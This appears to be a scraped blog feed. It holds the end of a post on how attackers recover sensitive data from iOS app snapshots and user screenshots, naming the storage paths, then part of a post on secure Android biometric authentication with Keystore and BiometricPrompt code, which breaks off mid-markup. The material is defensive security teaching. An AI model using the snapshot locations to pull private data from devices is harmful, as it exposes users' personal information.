#f3f3f3;"><blockquote>/var/mobile/Containers/Data/Application/B9008870-3F72-4B0E-ADEC-D867FBA060A2/Library/Caches/Snapshots/com.apple.mobilesafari</blockquote></blockquote></span></div></div><div><br /></div><div>The following screenshot is showing the content of the above folder:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXDe6yMNOmk_zwwn-kx87xhvPfKDeB8jEPf-0_C1Pp5kpToEOrwvzNqVFpe6w2iugDpfBHMrtelW6DwUKORdu80UUj3NQc9uQ-uHQM9k3NkRj6CmYDB0fAWaTqcNTy2LLFaC2qMQhEBl8/s1334/IMG_0037.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1334" data-original-width="750" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXDe6yMNOmk_zwwn-kx87xhvPfKDeB8jEPf-0_C1Pp5kpToEOrwvzNqVFpe6w2iugDpfBHMrtelW6DwUKORdu80UUj3NQc9uQ-uHQM9k3NkRj6CmYDB0fAWaTqcNTy2LLFaC2qMQhEBl8/s320/IMG_0037.PNG" /></a></div><br /><div><br /></div><div>Finally, opening the file named <i>E341AE9B-B12A-4E8B-AB08-1DA156CDF9E2@2x.ktx</i> we can see that the content is the screenshot that was shown in the <b>iOS</b> task manager shown before:</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAr1t5GEnSqyA6QewOFMJLTX2kz6TZtb1WGkV0JfOoFeWu25N_FcD6lQT5tT8GHUdPHRH9kS66OerQudgerB8RKK2lXbFvgOSgz3MXdHc5f-A9qAhR07Zo3c_7IP59Gxax7KjLcgmzCkI/s1334/IMG_0038.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1334" data-original-width="750" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAr1t5GEnSqyA6QewOFMJLTX2kz6TZtb1WGkV0JfOoFeWu25N_FcD6lQT5tT8GHUdPHRH9kS66OerQudgerB8RKK2lXbFvgOSgz3MXdHc5f-A9qAhR07Zo3c_7IP59Gxax7KjLcgmzCkI/s320/IMG_0038.PNG" /></a></div><br /><h4 style="text-align: left;">Example - 2: accessing user generated screenshots</h4><div><div>In a similar way, user generated screenshots can be accessed from any application which the permission to access the device photo library was granted.</div><div>In this example, we are explicitly generating a screenshot of the Safari application.</div></div><div><br /></div><div>User generated screenshots can be found at the following location in iOS12:</div><div><span style="font-family: courier;"><blockquote 
style="background-color: #f3f3f3;"><blockquote>/var/mobile/Media/DCIM/100APPLE/</blockquote></blockquote></span></div><div><br /></div><div>Accessing this location, and opening the file named IMG_0039.PNG we can finally access the previously generated screenshot:</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVH6mDlDqyoGDNBlmsuLzchyphenhyphen1Rgo_G2LNZxwUjWlYihMPC0Qaq8g9P11hV3-yIh1XD1hZEJhcWYS5iDxlG7Ku8GMebQHA6jnh9C6bm6looT4r7WC19_SVF0dbZtZl2iCuxwZ0p6G0Qa-8/s1334/IMG_0039.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1334" data-original-width="750" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVH6mDlDqyoGDNBlmsuLzchyphenhyphen1Rgo_G2LNZxwUjWlYihMPC0Qaq8g9P11hV3-yIh1XD1hZEJhcWYS5iDxlG7Ku8GMebQHA6jnh9C6bm6looT4r7WC19_SVF0dbZtZl2iCuxwZ0p6G0Qa-8/s320/IMG_0039.PNG" /></a></div><br /><div><br /></div><h2 style="text-align: left;">Conclusions and next steps</h2><div><div>This article analyzed which risks and scenarios are afflicting mobile applications which are not explicitly implementing mobile screenshotting prevention, trying to clearly explain what an attacker can do in order to gather personal data and sensitive information.</div><div><br /></div><div>What can a user do in order to prevent sensitive data from being stolen leveraging this kind of attack? 
</div><div><br /></div><div>It must be noted that the user alone cannot totally prevent these types of attacks, but can mitigate them by following these best practices:</div><div><ul style="text-align: left;"><li><span id="docs-internal-guid-c9213e6f-7fff-1585-2779-19cb0ca1b52f"><div><div>Do not let people have unauthorized physical access to the device.</div></div></span></li><li><span id="docs-internal-guid-c9213e6f-7fff-1585-2779-19cb0ca1b52f"><div><div>Do not install any application coming from untrusted sources such as email attachments, unofficial application stores or any other source available on the web.</div></div></span></li><li><span id="docs-internal-guid-c9213e6f-7fff-1585-2779-19cb0ca1b52f"><div><div>Do not modify the device or operating system state by rooting, jailbreaking or installing modified versions of the mobile operating system.</div></div></span></li></ul></div><div><br /></div><div>The next question is: how can a mobile application be checked for Mobile Screenshot countermeasures? How can this issue be fixed?</div><div><br /></div><div>These topics will be covered in one of the next blog posts with the title: “<b>Mobile Screenshot Prevention Cheat Sheet - Testing and Fixing</b>”.</div></div><div><br /></div><span><a name='more'></a></span><div><br /></div><div><div>References: </div><div>[1] <a href="https://stackoverflow.com/questions/8779700/screenshot-from-background-service-of-another-application-programmatically">https://stackoverflow.com/questions/8779700/screenshot-from-background-service-of-another-application-programmatically</a></div><div>[2] <a href="https://stackoverflow.com/questions/9746711/programmatically-take-screenshots-on-ios-from-anywhere">https://stackoverflow.com/questions/9746711/programmatically-take-screenshots-on-ios-from-anywhere</a></div></div><div><br /></div></span></div>
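On the Android side, the "screenshotting countermeasure" the story above says SuperSecureMail was missing is the window-level FLAG_SECURE. The following Activity is an added example written for this page, not code from the post or from the announced "Testing and Fixing" follow-up; the layout resource name is hypothetical.

```java
import android.app.Activity;
import android.os.Bundle;
import android.view.WindowManager;

/**
 * Activity that displays sensitive content (for instance the temporary credentials in the
 * SuperSecureMail story) with its window marked as secure. Added example, not the post's code.
 */
public class TemporaryCredentialsActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        // Set the flag before the first frame is drawn, i.e. before setContentView().
        // With FLAG_SECURE the system refuses user-initiated screenshots of this window,
        // blanks it in screen-capture / MediaProjection output, and stores an obscured
        // snapshot for the recents (task manager) view instead of the rendered content,
        // which is exactly the artefact Scenario 2 relies on.
        getWindow().setFlags(WindowManager.LayoutParams.FLAG_SECURE,
                             WindowManager.LayoutParams.FLAG_SECURE);

        setContentView(R.layout.activity_temporary_credentials); // hypothetical layout resource
    }
}
```

The flag is per window, so a Dialog or a separate popup window showing the same credentials needs it set on its own window as well. On a rooted device, where Scenario 2 assumes privileged malware, the flag is only one layer of defence and not a guarantee; the post's own advice to the user (no rooting, no untrusted installs) is the other layer.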
Martino Lessiohttp://www.blogger.com/profile/15529162337412441148noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-72451932148016156972020-07-30T01:20:00.000-07:002020-07-30T01:20:23.919-07:00Implementing Secure Biometric Authentication on Mobile Applications<h3 style="text-align: left;"><br /></h3>
<div style="text-align: justify;">
Nowadays, almost every mobile device has a biometric sensor that allows
developers to implement local authentication and also store sensitive data
securely through dedicated APIs.
</div>
<div style="text-align: justify;">
Biometric authentication is generally more secure than the classic
username/password approach. However, a wrong implementation could allow an
attacker to easily bypass the authentication mechanism by using hooking
techniques, which can be performed with tools like Frida, Objection and
other similar utilities.
</div>
<div style="text-align: justify;"><br /></div>
<div style="text-align: justify;">
In this article we are going to describe some common mistakes that developers can make while implementing biometric authentication, and how to implement it
correctly.
</div>
<div style="text-align: justify;"><br /></div>
<div><br /></div>
<h3 style="text-align: left;">Biometric Authentication in Android</h3>
<div>
<div style="text-align: justify;">
<div>
The Android platform introduced biometric authentication in Android
6.0 (API level 23) with the <i>FingerprintManager</i> class, which
supported only fingerprint authentication.
</div>
<div>
In Android 9 (API level 28), <i>FingerprintManager</i> was deprecated
in favour of <i>android.hardware.biometrics.BiometricPrompt</i>.
</div>
<div>
Lastly, in Android 10 (API level 29) biometric authentication is
managed through <i>android.hardware.biometrics.BiometricManager</i>.
</div>
<div><br /></div>
<div>
It is worth noting that the Android platform also provides the classes
<i>androidx.biometric.BiometricManager</i> and
<i>androidx.biometric.BiometricPrompt</i>, which can be used instead of
the previous ones. These classes automatically query the <i>BiometricManager</i>
on devices running Android 10 (API 29) and
<i>FingerprintManagerCompat</i> on Android 9.0 (API 28) and earlier
versions.
</div>
<div><br /></div>
<div>
The Android platform, unlike iOS, does not allow arbitrary data to be saved
in the Keystore. However, it allows encryption keys to be created and
saved in the <i>Keystore</i>, and for every key it is possible to define the
access criteria.
</div>
<div>
In order to implement effective biometric authentication, it is therefore
necessary to create a key that can be used only after a successful
biometric authentication. This key should be used to encrypt and decrypt
sensitive data such as an authentication token.
</div>
<div><br /></div>
<div>
<span id="docs-internal-guid-1f10d6c9-7fff-1cbf-f296-cc86ccaf1c1d"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">In order to use the biometric authentication all of the following requirements must be fulfilled:</span></span>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;"><br /></span>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">1) <b>Require </b></span><span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;"><b>the proper permission in the Android Manifest</b>:</span>
</div>
<div>
<font face="arial"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></font>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<uses-permission android:name="android.permission.USE_FINGERPRINT" />
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<uses-permission android:name="android.permission.USE_BIOMETRIC" />
</div>
</div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span><br />
<div><br /></div>
</div>
<div></div>
<div>
<span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">2) <b>Check if the user can authenticate using biometrics:</b>
</span>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">This includes having a protected lock screen enabled, biometric hardware available and a biometric identity enrolled (for instance a fingerprint). The following piece of code shows a sample implementation:</span>
</div>
<div>
<br />
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
import androidx.biometric.BiometricManager;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
. . .
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
BiometricManager biometricManager = BiometricManager.from(this);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
switch (biometricManager.canAuthenticate()) {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
case BiometricManager.BIOMETRIC_SUCCESS:
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// User can authenticate using biometrics
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
break;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
case BiometricManager.BIOMETRIC_ERROR_NO_HARDWARE:
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// No biometric features available on this device
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
break;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
case BiometricManager.BIOMETRIC_ERROR_HW_UNAVAILABLE:
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// Biometric features are currently unavailable
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
break;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
case BiometricManager.BIOMETRIC_ERROR_NONE_ENROLLED:
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// The user hasn't associated any biometric credentials with their account
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
break;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
}
</div>
<div><br /></div>
</div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span><br />
<div><br /></div>
<div>
3) <span id="docs-internal-guid-70e8482c-7fff-4845-fe90-0a339f365492"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><b>Check if the application has the correct permissions</b>:</span></span>
</div>
<div><br /></div>
<div>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
boolean fingerprintGranted = context.checkSelfPermission(Manifest.permission.USE_FINGERPRINT) == PackageManager.PERMISSION_GRANTED;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<br />
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
boolean biometricGranted = context.checkSelfPermission(Manifest.permission.USE_BIOMETRIC) == PackageManager.PERMISSION_GRANTED;
</div>
</div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span><br />
<div>
<span id="docs-internal-guid-026837ee-7fff-ec6b-901e-f36d156cc0d0"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The most important methods used to implement biometric authentication in Android are the following:</span>
</p>
<div>
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1) <b>authenticate</b> </span><span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">(which starts the authentication flow):</span>
</div>
<div><br /></div>
<div>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
biometricPrompt.authenticate(promptInfo, new BiometricPrompt.CryptoObject(cipher));
</div>
</div>
</div>
<br />
<div>
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2) </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">onAuthenticationSucceeded </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">(which is called upon a successful authentication):</span>
</div>
</div></span>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
</div>
<div>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
@Override
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
public void onAuthenticationSucceeded(
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
@NonNull
BiometricPrompt.AuthenticationResult result) {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// . . . .
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
}
</div>
<div><br /></div>
</div>
</div>
<br />
<div>
<span id="docs-internal-guid-ba2e7268-7fff-8ce9-e786-e329fd143786"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The cipher wrapped in the <i>BiometricPrompt.CryptoObject</i> passed to the <i>authenticate</i> method should be used to decrypt secret data that was previously stored on the device. The cipher can use either a symmetric or an asymmetric algorithm.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">In the following example we create a key for a cipher that uses AES-CBC-PKCS7.</span></p>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
KeyGenerator keyGenerator = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, "AndroidKeyStore");
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
keyGenerator.init(new KeyGenParameterSpec.Builder(KEY_ALIAS,
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
KeyProperties.PURPOSE_ENCRYPT |
KeyProperties.PURPOSE_DECRYPT)
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
.setBlockModes(KeyProperties.BLOCK_MODE_CBC)
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
.setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7)
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
.setUserAuthenticationRequired(true)
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
.setUserAuthenticationValidityDurationSeconds(-1)
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
.setInvalidatedByBiometricEnrollment(true)
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
.build()
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
keyGenerator.generateKey();
</div>
</div>
</div>
<br />
<div>
<br />
<span id="docs-internal-guid-c9559110-7fff-b907-de8d-eab6f4ef889a"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">When creating the key for the cipher that will be used in the biometric authentication flow, the most important options are the following:</span></span>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div></span>
</div>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1) </span><span style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;"><b>setUserAuthenticationRequired(true)</b>: available from API level 23; when set to true, the key can be used only after the user has been authenticated. In addition, the key becomes irreversibly invalidated once the secure lock screen is disabled or forcibly reset.</span>
</div><div><br /></div>
<div>
<span style="font-size: 14.6667px; white-space: pre-wrap;"><font face="arial">2) <b>setUserAuthenticationValidityDurationSeconds(-1)</b>: available from API level 23; when set to -1, the key can be unlocked only with a biometric identity. With any other value the key can also be unlocked with the device screen lock.</font></span>
</div><div><font face="arial"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></font></div><div><font face="arial"><span style="font-size: 14.6667px; white-space: pre-wrap;">3) <b>setInvalidatedByBiometricEnrollment(true)</b>: available only from API level 24; when set to true, the key is irreversibly invalidated when a new biometric is enrolled or when all existing biometrics are deleted. Note that true is the default value.</span></font></div>
<div><br /></div>
<div><br /></div>
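<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">The enrollment side of this flow, which the post only refers to as the secret data "previously stored in the device", is shown in the following added example (it is not code from the original post). It generates the key with the three options just listed and then encrypts the authentication token inside a BiometricPrompt callback: with a validity duration of -1 every use of the key, encryption included, is authorised only by a biometric authentication, so the encrypt operation itself has to travel through a CryptoObject. The IV generated by the keystore is saved together with the ciphertext because AES-CBC decryption will need it later. The key alias, the SharedPreferences file and its entry names are assumptions, and the androidx.biometric classes are assumed to be on the classpath.</span></p>

```java
import android.content.Context;
import android.security.keystore.KeyGenParameterSpec;
import android.security.keystore.KeyProperties;
import android.util.Base64;
import androidx.annotation.NonNull;
import androidx.biometric.BiometricPrompt;
import androidx.core.content.ContextCompat;
import androidx.fragment.app.FragmentActivity;
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;

/**
 * Enrollment side: the authentication token is encrypted with the
 * biometric-bound key and ciphertext plus IV are persisted for the login step.
 * Added example; KEY_ALIAS and PREFS are assumed names.
 */
public final class BiometricTokenEnrollment {
    private static final String KEY_ALIAS = "biometric_token_key"; // assumed alias
    private static final String PREFS = "biometric_vault";          // assumed prefs file
    private static final String TRANSFORMATION = KeyProperties.KEY_ALGORITHM_AES + "/"
            + KeyProperties.BLOCK_MODE_CBC + "/" + KeyProperties.ENCRYPTION_PADDING_PKCS7;

    /** Creates (or replaces) the key with the three options discussed above. */
    static SecretKey generateKey() throws GeneralSecurityException {
        KeyGenerator generator = KeyGenerator.getInstance(
                KeyProperties.KEY_ALGORITHM_AES, "AndroidKeyStore");
        generator.init(new KeyGenParameterSpec.Builder(KEY_ALIAS,
                KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)
                .setBlockModes(KeyProperties.BLOCK_MODE_CBC)
                .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7)
                .setUserAuthenticationRequired(true)
                .setUserAuthenticationValidityDurationSeconds(-1)
                .setInvalidatedByBiometricEnrollment(true)
                .build());
        return generator.generateKey();
    }

    /**
     * With a validity duration of -1 every key operation, encryption included,
     * is authorised only through a BiometricPrompt carrying the cipher in a
     * CryptoObject, so the encryption happens inside the success callback.
     */
    static void enroll(@NonNull final FragmentActivity activity,
                       @NonNull BiometricPrompt.PromptInfo promptInfo,
                       @NonNull final String token) throws GeneralSecurityException {
        final SecretKey key = generateKey();
        final Cipher cipher = Cipher.getInstance(TRANSFORMATION);
        cipher.init(Cipher.ENCRYPT_MODE, key); // AndroidKeyStore generates a random IV

        BiometricPrompt prompt = new BiometricPrompt(activity,
                ContextCompat.getMainExecutor(activity),
                new BiometricPrompt.AuthenticationCallback() {
                    @Override
                    public void onAuthenticationSucceeded(
                            @NonNull BiometricPrompt.AuthenticationResult result) {
                        BiometricPrompt.CryptoObject crypto = result.getCryptoObject();
                        if (crypto == null || crypto.getCipher() == null) {
                            return; // no platform-unlocked cipher: store nothing
                        }
                        try {
                            Cipher unlocked = crypto.getCipher();
                            byte[] ciphertext = unlocked.doFinal(
                                    token.getBytes(StandardCharsets.UTF_8));
                            store(activity, unlocked.getIV(), ciphertext);
                        } catch (GeneralSecurityException e) {
                            // Key not unlocked by the OS: nothing is persisted and the
                            // user keeps logging in with credentials
                        }
                    }
                });
        prompt.authenticate(promptInfo, new BiometricPrompt.CryptoObject(cipher));
    }

    /** Persists IV and ciphertext; both are needed for the later CBC decryption. */
    static void store(@NonNull Context context, byte[] iv, byte[] ciphertext) {
        context.getSharedPreferences(PREFS, Context.MODE_PRIVATE).edit()
                .putString("iv", Base64.encodeToString(iv, Base64.NO_WRAP))
                .putString("token_ct", Base64.encodeToString(ciphertext, Base64.NO_WRAP))
                .apply();
    }
}
```

<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">The token is encrypted with the cipher instance returned in the AuthenticationResult rather than with the local one, so a callback that arrives without an unlocked cipher stores nothing.</span></p>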
<div>
<span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">Before authenticating the user with biometrics, the cipher should be initialised so that the validity of the key can be checked. This can be done as follows:</span>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;"><br /></span>
</div>
<div>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
public Cipher getCipherForBiometrics(byte[] iv) {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
try {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
final Cipher cipher = Cipher.getInstance(
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
KeyProperties.KEY_ALGORITHM_AES + "/"
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
+ KeyProperties.BLOCK_MODE_CBC + "/"
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
+ KeyProperties.ENCRYPTION_PADDING_PKCS7);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
final SecretKey key;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
final KeyStore keyStore = KeyStore.getInstance("AndroidKeyStore");
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
keyStore.load(null);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
key = (SecretKey) keyStore.getKey(KEY_ALIAS, null);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// AES/CBC decryption also needs the IV that was saved next to the encrypted data
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
cipher.init(Cipher.DECRYPT_MODE, key, new IvParameterSpec(iv));
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
return cipher;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
} catch (KeyPermanentlyInvalidatedException e) {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// the key was invalidated (lock screen reset or biometric enrollment changed)
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
return null;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
} catch (KeyStoreException | CertificateException | UnrecoverableKeyException | IOException
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
| NoSuchAlgorithmException | InvalidKeyException | InvalidAlgorithmParameterException | NoSuchPaddingException e) {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
throw new RuntimeException("Failed to init Cipher", e);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
}
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
}
</div>
<div><br /></div>
</div>
</div>
<br />
<div>
<span id="docs-internal-guid-0dcc4e6f-7fff-7bce-0c25-a0ec899a0bc8"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Once the cipher has been properly initialised, it is passed as an argument to the authenticate method in order to start the biometric authentication flow.</span>
</p></span>
</div>
</div>
<div>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
